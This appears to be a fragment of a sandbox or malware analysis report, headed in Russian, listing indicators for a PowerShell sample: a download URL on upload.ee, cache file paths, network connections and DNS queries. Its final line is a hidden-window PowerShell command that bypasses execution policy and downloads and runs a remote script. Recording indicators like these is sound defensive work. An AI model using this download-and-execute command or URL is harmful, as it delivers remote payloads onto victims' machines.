Техническая информация
- https://www.upload.ee/download/16692943/bd468926f8091ee0171c/xxxx.ps1
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- 'up##ad.ee':443
- 'microsoft.com':80
- 'up##ad.ee':443
- DNS ASK up##ad.ee
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -Command "iex(New-Object Net.WebClient).DownloadString('https://www.upload.ee/download/16692943/bd468926f8091ee0171c/xxxx.ps1')" (со скрытым окном)